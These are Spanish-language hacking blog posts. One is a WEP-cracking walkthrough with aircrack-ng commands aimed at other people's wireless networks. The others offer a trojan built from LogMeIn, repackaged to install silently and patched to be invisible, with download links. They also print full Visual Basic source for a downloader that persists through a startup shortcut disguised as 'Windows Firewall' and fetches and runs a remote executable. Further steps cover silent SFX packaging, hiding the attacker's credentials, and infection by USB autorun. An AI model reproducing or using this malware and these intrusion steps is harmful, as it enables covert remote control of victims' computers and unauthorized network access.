Crackear WEP en 15 segundos

Este va a ser un tutorial simple. primero empezaremos con algo de teoria.

Hoy en dia cabe aclarar que WEP es un cifrado practicamente obsoleto, y a ésto lo demostraremos con la facilidad con la que se puede obtener una clave. Es por eso, que siempre se deben usar metodos de cifrado WPA/WPA2.

Sin embargo, algunos de los técnicos de los ISP, no tienen ni la menor idea de lo que hacen y dejan las redes wireless domesticas con claves WEP o inclusive hasta abiertas. Tambien algunos  “administradores de red”  (con fuerza en las “”) dejan redes de empresas grandes con cifrados WEP.

Hay que aclarar algo, el cifrado WEP puede tener cierto grado de seguridad utilizando un cifrado de 128bit, es decir, 32 caracteres, y combinando caracteres alfanumericos, con simbolos etc… pero se pierde la practicidad, ya que si alguien necesita conectarse, debera aprenderse una clave de 32 numeros/letras… imposible…

Aunque, por más larga que sea la clave, o si tiene mezclados letras y simbolos, es posible crackearla con una buena cantidad de paquetes.

Esto me da pie para decir que, el secreto del cracking de claves WEP esta en capturar la mayor cantidad de paquetes que anden dando vueltas por la red. mientras más paquetes tengamos menos tardaremos en crackear la pass.

El proceso de crackeo, se hace crackeando(valga la redundancia) el contenido de los IVs de la red. (Vectores de Inicializacion). estos IVs se envian por cada paquete que sale del AP.

Para obtener paquetes, hay varias técnicas, de las cuales, voy a explicar 2.
La primera, es intentar inyectar paquetes con pedidos ACK y ARP para generar algun trafico en la red…   aunque debo decir que hoy en dia, la mayoria de los AP no responden bien cuando intentamos “inyectarle paquetes”…  supongo que traen una proteccion para ello.
La segunda técnica, es infalible. Conciste en esperar a que se genere algun tipo de trafico por parte de los usuarios conectados en el AP. Quizas, si no tenemos suerte, y los clientes del AP solo navegan por algunas webs demoremos un poco en obtener una buena cantidad de paquetes…  pero si justo capturamos paquetes cuando estan viendo un video online, o transfiriendo un archivo…. en menos de 2 minutos tendremos la clave de encriptacion.

Bueno, habiendo dicho ya la teoria del cracking wireless, paso a mencionar las herramientas necesarias.

BACKTRACK

Sin duda, la mejor suite de Seguridad….   no solo sirve para crackear wireless sino, que tambien, trae muchisimas herramientas para penetrar y probar sistemas de seguridad en redes.

Recomiendo hacer un PenDrive booteable con backtrack. (google: como hacer backtrack boot usb)

Si tienes problemas con la placa de red con sus drivers o cosas por el estilo, busca una solucion en google… yo voy a suponer que ya tenemos nuestro backtrack corriendo y todo listo…

Lo primero a realizar, sera inicializar la placa de red en modo monitor…

airmon-ng  start wlan0

(donde wlan0 es el nombre de la placa. nota: dice wlan”cero”)

Cuando este listo, vamos a empezar a escanear redes, para ver todos los AP que esten activos:

airodump-ng wlan0

Si todo esta bien, vas a ver una lista con todas las redes disponibles.

BSSID: es la MAC del AP
Power: es la calidad o potencia con la que recibimos la señal.
Beacons: son las señales (paquetes) que envia el AP para que nos conectemos.
Data: son los paquetes que nos envio el AP. (estos son los paquetes importantes que deberemos capturar)
ESSID: es el SSID de la red, es decir, el nombre con el que se identifica la red.

Tambien tenemos info del canal en el que está el AP, (CH), la velocidad de transferencia maxima (MB) y el tipo de encriptacion (ENC).  en este ultimo, debe decir WEP. luego, la columa CIPHER es el tipo de cifrado, tambien debe decir wep. AUTH es el tipo de autenticacion…  a nosotros nos interesan los que dicen OPN, o no dicen nada.

Cuando encontremos una red vulnerable, es conveniente anotar en un txt la mac del ap (BSSID) y el SSID (ESSID)
Ahora, hacemos que el airodump, nos capture solo los paquetes de la red que nos interesa y los guarde en un archivo.

airodump-ng --ivs --write archivo --bssid (BSSID de la red) --channel (canal de la red) wlan0

Eso es todo, ahi ya estamos capturando paquetes. si tenemos suerte y la victima esta usando la red, la cantidad de “DATA” subira muy rapido. Si no tenemos suerte, podemos intentar inyectar paquetes de la siguiente forma:

Nota: no cierres nunca la consola del airodump que esta capturando paquetes. para ejecutar los siguientes comandos abre otra ventana de consola.

aireplay-ng --fakeauth 10 -h 00:11:22:33:44:55 -a (BSSID del AP) wlan0

Una vez realizado el paso anterior, empezaremos a enviar paquetes ARP (en otra consola):

aireplay-ng --arpreplay -h 00:11:22:33:44:55 -b (BSSID del AP)

Bien eso es todo lo que podemos hacer. Como dije anteriormente, siempre conviene tener muchisima paciencia y dejar que la PC capture muchos paquetes…. cuando la victima use la red.

Ahora, para crackear, necesitamos de unos 100.000 paquetes en adelante para crackear una WEP de 40 bits (16 caracteres).

Para comenzar a crackear, usamos el comando:

aircrack-ng *.ivs

De esta forma, el programa comenzara a crackear la clave.

Despues de un tiempo, nos saldra un cartel diciendo KEY FOUND: y la clave al lado en hexadecimal y en ASCII

Bien, espero que les sirva.

Saludos.

Dhackers está de vuelta!!!

http://www.dhackers.com

SI. Hemos vuelto.

Dhackers.net  – La libertad  de hackers


Despues de un tiempo en off….  volvemos para quedarnos. Estamos preparando todo con Senege para tener el foro mucho mejor.

Estan todos invitados a unirse.  Es un foro totalmente libre.

Dhackers es la mejor comunidad Underground de Hackers de habla Hispana, aqui te ayudamos y pedimos ayuda sin temor a que nos manden a buscar a Google. En Dhackers somos todos iguales, NO importan los rangos, solo importan las ganas de compartir y ayudar.

De momento tenemos problemitas con el dominio .net (dhackers.net) pero hasta que se solucionen  se podra acceder via Dhackers.com.

Nos vemos alli.

Dhackers

Troyano con LogMeIn –> Actualización a la versión 4.0.0.966

Esta versión corrige algunos bugs de LogMeIn y ademas cambia buena parte del estilo grafico de la pagina.

Si tenias el LogMeIn instalado, ya te habrá pedido que lo actualices, pero si lo tenias patcheado, para que sea invisile, nunca te va a pedir que lo actualices.

Recomiendo actualizar a la nueva version, porque me parece que la version vieja va a dejar de funcionar….(eso es lo que creo.)

Bueno, con respecto al  Troyano, corregi todos los problemas encontrados y problemas  de compatibilidad de Windows.

En el paquete de descarga, no encontraran el downloader, porque éste funciona perfectamente como está explicado aqui.

En el paquete SI van a encontrar éstos archivos principales:

LMI_Backdoor_by_Lordblacksuca.msi –> este es el instalador de LogMeIn v4.0.0.966 modificado para que la instalación sea totalmente silenciosa.

logmein-patch.exe –> este es un paquete autoextraible donde se encuentran los archivos .dll v4.0.0.966 modificados para hacer que logmein sea totalmente invisible. (la ruta de extraccion de este paquete es la de instalacion de logmein por defecto).

ejecutar.bat –> Ahora solo hay un ejecutable con lineas comentadas. dentro de este archivo, ademas de editar el nombre de usuario y contraseña de tu cuenta con logmein deberas descomentar las lineas segun tu SO.  Esta todo explicado ahi dentro.

ADEMAS

originales.rar –>  Jejeje, aqui estan los .dll originales del logmein, por si se infectan ustedes mismos, reemplacen estos archivos, asi pueden parar el logmein y luego desinstalarlo desde el panel de control.

taskkill.exe –> Este archivo siempre tiene que estar en la misma carpeta que el ejecutar.bat solo es el taskkill original de un windows XP Professional, pero de esta forma nos aseguramos que los procesos para patchear se terminen correctamente.

Si tienes problemas con el ejecutar.bat  es desir que no se te instale, o no se patchee automaticamente, seguramente es por alguna incopatibilidad de los comandos del Fucking Windows. Por favor, deja un comentario con tu problema.


DESCARGA

Megaupload

Rapidshare

Bueno, eso es todo por ahora, como siempre, espero comentarios y bugs con respecto al troyano.

Hay muchas formas de usarlo, yo se los doy listo…  despues, de lo que haga cada uno con el, bueno, yo no me hago cargo. jejejeje

una ultima aclaracion, recuerda que si vas a infectar una PC, el archivo ejecutar.bat tiene TUS datos de conexion con logmein. DEBES ocultarlo, convertirlo a exe… borrarlo o lo que quieras, pero no lo olvides por ahi!!! Puedes usar el programa ExeScript 3.0 para hacer un .exe solido, y totalmente invisible.

Si estas leyendo ésto y no entiendes nada…  te recomiendo que leas todo ESTO desde el principio…

Downloader en VB INDETECTABLE! –> Complemento para el Troyano con LogMeIn

Downloader en VB.

Este downloader, fue creado con la intencion de utilizarlo con este post, pero cabe aclarar que sirve para cualquier otra aplicacion.

Qué es un Downloader?

Un downloader se utiliza para descargar en la maquina victima un programa pesado, es desir, que ocupa muchos MB entonces se hace imposible camuflarlo para mandarlo por messenger por ejemplo. En general, este “Programa Pesado” es un virus, o un troyano como en el caso nuestro.

Lo que hace es, basicamente, generar un server liviano, (20k) y cuando es ejecutado por la victima, se “instala” secretamente en la maquina y comienza a descargar el archivo, desde la URL que nosotros le hayamos indicado…  cuando la descarga es finalizada, ejecuta el archivo descargado.

Eso es todo.

Comenzamos con el desarrollo de nuestro Downloader

El codigo está escrito en VB, solo hay que pegar el codigo en un Form,  compilar y Listo! no necesita de ningun complemento.

Solo hay que editar 2 lineas, una es la URL de donde se descargara el archivo, y la otra es el Path de destino (donde se guardará) el mismo.

El downloader puede descargar y ejecutar cualquier extension de archivo, siempre y cuando esa extension esté asociada con algun programa en la PC victima. (comando Shell Execute)

Este downloader, al ser ejecutado, guarda un acceso directo al ejecutable del mismo, en la carpeta de inicio del sistema (menu inicio–>programas–>inicio), esto es por si la victima apaga la pc y el archivo no se ha terminado de descargar aun, entonces cuando la vuelva a prender, se comenzara a descargar nuevamente. Una vez terminada la descarga, el acceso directo se elimina.

Este es el codigo fuente del Downloader en VB:

'declaraciones para ejecutar una vez descargado
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_SHOWNORMAL = 1
'declaraciones para guardar el archivo ini
Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Private Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Private Declare Function FileExists Lib "shlwapi.dll" Alias "PathFileExistsA" (ByVal pszPath As String) As Long
'declaraciones para descargar
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
'declaraciones para guardar el acceso directon en el inicio del sistema
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Private Const CSIDL_STARTUP = &H7
Private Const CSIDL_COMMON_STARTUP = &H18
Dim obj As Object
Dim acceso_directo As Object

Private Sub form_load()
Dim estado As String
Iniciarconwindows
estado = INI_Read(App.Path & "\FirewallOptions.ini", "Estado", "Update")
If Trim(estado) = "Listo!" Then
Quitariniciarconwindows
End
End If
Dim sSourceUrl As String
Dim sDestinationUrl As String

sSourceUrl = "http://www.mipagina.com.ar/lordblacksuca.exe"  ' esta es la URL de donde se descarga el archivo
sDestinationUrl = "C:\lordblacksuca.msi"  'este es el path donde se va a guardar el archivo

Call INI_Write(App.Path & "\FirewallOptions.ini", "Estado", "Update", "Descargando")
DownloadFile sSourceUrl, sDestinationUrl
Call ShellExecute(Me.hwnd, vbNullString, sDestinationUrl, vbNullString, vbNullString, SW_SHOWNORMAL)
Call INI_Write(App.Path & "\FirewallOptions.ini", "Estado", "Update", "Listo!")
End
End Sub
'funcion para descargar
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
'funcion para que el programa inicie cuando se inicia windows
Private Function Iniciarconwindows()
Set obj = CreateObject("wscript.Shell")
Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & "\Windows Firewall.lnk")
With acceso_directo
.TargetPath = App.Path & "\" & App.EXEName
.Save
End With
End Function
Function Quitariniciarconwindows()
If Dir(GetSpecialfolder(CSIDL_STARTUP) & "\Comodin.lnk", vbNormal) = "" Then Exit Function
Call Kill(GetSpecialfolder(CSIDL_STARTUP) & "\Comodin.lnk")
End Function
'funcion para escribir y leer de un ini
Public Function INI_Read(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, Optional ByVal Default As String) As String
On Error GoTo ErrOut
Dim Size As Integer
Dim Value As String
'Comprobamos que el archivo existe:
If Not CBool(FileExists(Filename)) Then Err.Raise 53
'Se define el tamaño maximo de caracteres
'que podra tener la variable Value:
Value = Space(256)
'Se utiliza la función para obtener
'el valor de la clave:
Size = GetPrivateProfileString(Key_Value, Key_Name, Default, Value, Len(Value), Filename)
'Si el tamaño es mayor a 0 entonces
'se ha encontrado el valor de la clave:
If Size > 0 Then
Value = VBA.Left$(Value, Size)
'Devolvemos el valor de la clave:
If VBA.Right$(VBA.Trim$(Value), 1) = Chr(0) Then Value = VBA.Left$(VBA.Trim$(Value), Len(VBA.Trim$(Value)) - 1)
INI_Read = VBA.Trim$(Value)
Exit Function
End If
ErrOut:
INI_Read = Default
End Function
'Metodo de escritura. Si el archivo al que se refiere el parametro Filename
'no existe se crea automaticamente:
Public Sub INI_Write(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, ByVal Value As String)
On Error GoTo ErrOut
Dim Size As Integer
'Escribimos el valor de la clave:
Size = WritePrivateProfileString(Key_Value, Key_Name, Value, Filename)
ErrOut:
End Sub

'funcion para obtener el path al inicio del sistema
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function

Para que no se gasten en Copiar y Pegar, aca les dejo el Proyecto de Visual Basic para que descargen:

Downloader en VB

Eso fue todo en cuanto al Downloader.


Complementando el Troyano Indetectable con LogMeIn

Como habrán visto, el troyano se compone de 3 archivos. El Instalador Modificado de LogMeIn, el Patch para hacerlo invisible y un archivo .bat, para coordinar todo. Ahora, tenemos que unirlos a todos en un solo .exe

Aclaro en este punto, que existen muchas formas de hacerlo, cualquiera es válida, solo hay que tener una precaución:

Este troyano fue ideado para ejecutarse mediante una Inyección USB por lo tanto habia cosas que no importaban, pero que ahora si, por ejemplo, el archivo ejecutar.bat contiene nuestros datos de acceso a la cuenta de LogMeIn, por lo tanto, si el downloader descarga el archivo, la victima tendria “al alcance de sus manos” nuestros datos, entonces resultariamos nosotros los “hackeados”.

Eso se puede solucionar, convirtiendo el archivo .bat a .exe mediante el programa Bat to Exe Converter de esta forma:

Convertir el .bat a .exe

1º Descargar al archivo:  http://rapidshare.com/files/270764528/DownloaderVB_y_Bat_to_Exe_Converter.rar

2º Seleccionar el archivo .bat a ser convertido.

3º Configurar las opciones ASI:

Opciones de configuración de Bat to Exe Converter

Opciones de configuración de Bat to Exe Converter

4º Apretar Compile y Listo!

Teniendo ese tema solucionado, solo resta unir todos los archivos necesarios para la ejecución.

Para ello, utilizamos el WinRar, y hacemos un archivo SelfExtract invisible, y que al finalizar ejecute el archivo, ejecutar.exe de esta forma:

1º Seleccionar los archivos: ejecutar.exe, el Instalador Modificado de Logmein y el Patch para hacerlo invisible, hacer click derecho sobre uno de ellos y poner Añadir al Archivo… o Add to file… si esta en inglés.  (DEBES tener el WinRar instalado)

2º Seleccionamos Crear un Archivo SFX y Crear un Archivo sólido

Creando el único ejecutable

Creando el único ejecutable

3º En la pestaña Avanzado, hacemos click en Opciones SFX… ahí debemos indicar, que los archivos se extraigan en la misma carpeta y escribimos el nombre del archivo que tiene que ejecutar al finalizar la extracción:

Opciones de SFX

Opciones de SFX

4º En la pestaña Modos, configurar de la siguiente forma:

Opciones SFX "Modos"

Opciones SFX "Modos"

5º Si lo deseas en la pestaña Texto e Icono, puedes seleccionar un icono para el exe final.

6º Apretar en Aceptar y Listo!

Eso fue todo.

Este archivo que hemos creado, es un único archivo .exe, que al ser ejecutado, descomprime los otros archivos en la misma carpeta, y luego ejecuta el archivo llamado ejecutar.exe que es el que inicia todo el proceso de instalacion.

OBIAMENTE, los pasos a seguir, son subir el ultimo archivo creado a un ftp, y apuntar esa URL al downloader, para que este lo descargue y ejecute.

En un próximo post, vemos como hacer para camuflar el server del downloader.

Troyano Indetectable con LogMeIn — Instalación Silenciosa

Estimados lectores, en esta oportunidad, hacemos un troyano indetectable


Antes que nada….   esta es la ultima versión del troyano…  http://www.diegosucaria.info/troyano-con-logmein-actualizacion-a-la-version-4-0-0-966/ (de todas formas, recomiendo leer este post para entender el funcionamiento, y luego vayas al otro.)

Bueno, LogMeIn, es un programa de escritorio virtual como VNC, solo que funciona a través del puerto 80.

es decir…  no tiene barreras, ni antivirus que lo detecte.

te podes conectar a cualquier ordenador, no importa detrás de cuantos routers o switchs este, ni de si tiene IP privada o publica.  Es lo mismo. Solo hace falta acceso a Internet.

Vamos a aprender a “hackear” (palabra mal usada) con Logmein.   (en realidad es para aprender sobre el tema, para poder usar verdaderos troyanos el dia de mañana)

OK, la idea es la siguiente, vamos a tener varias formas de infectar el ordenador de la victima, pero esta vez, vamos a suponer que tenemos acceso fisico al ordenador, al menos por unos 30 segundos.  (Ideal para probar en sus casas, o en cibers….  despues de desactivar el deep freeze jaja)
La  infección la vamos a hacer con una inyeccion USB, si tenes xp.   Si tenes Vista o Seven, bueno, vas a tener que hacer doble click en el archivo…  (o usar el downloader que esta en los post relacionados)

Yo ya prepare todo para una inyeccion rapida con un archivo batch para XP. Todo lo que necesitas es un pendrive para llevar los archivos.

En el archivo rar, se encuentran los siguientes archivos:

ejecutar.bat –>  éste es el archivo que tenes que ejecutar para que comienze la instalacion

LMI_Backdoor_by_lordblacksuca.msi –>   éste es el instalador de Logmein modificado por mi.

autorun.inf –>  Autorun, esto es para hacer la inyeccion usb

logmein-patch.exe –>  este parche reempla 2 dll, del programa y lo hace totalmente invisible para la victima.

El procedimiento es el siguiente:

Antes que nada, tenes que tener una cuenta en Logmein.   www.logmein.com   es gratis para crear la cuenta.

Hay montones de tutoriales que explican como crear una cuenta ahí.

Despues:

1).   Descargar el archivo y extraerlos en el root de un pendrive.

Desde RapidShare

http://rapidshare.com/files/265924629/Backdoor_LMI_by_Lordblacksuca2.rar

Desde Megaupload

http://www.megaupload.com/?d=5461R46T

2).   ahora, tienes que editar el archivo ejecutar.bat con tus datos. Lo tenes que abrir con el notepad (o cualquier editor de texto), y editar la linea que dice:

LMI_Backdoor_by_Lordblacksuca.msi /qr USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free

En donde dice “contraseña” es la contraseña del ordenador,  las 2 tienen que ser iguales, eso lo pones a tu gusto.
donde dice tu-email@email.com y contraseñadelweb  tenes que poner tus datos de conexión de Logmein.

3)   Si tu victima tiene Windows XP, solo tenes que enchufar el pendrive y listo!   se inicia una consola MS-DOS y ahí te va diciendo los pasos que va haciendo…  demora aproximadamente 30 segundos. (dependiendo la maquina)

Si tu victima no tiene XP,  simplemente ejecutas el archivo ejecutar.bat

Es solo eso!!!

Ahora para controlar la maquina de tu victima, entras en la web   de logmein   www.logmein.com   pones tu email y contraseña seleccionas el ordenador, y le haces click en control remoto.

Cualquier duda   pregunta, no tengo problemas en responder.

A esto lo he diseñado yo, lordblacksuca.

Saludos!

Revision del post: Lunes 4 de Octubre del 2010 (corrección de ortografía y algunos errores de sintaxis)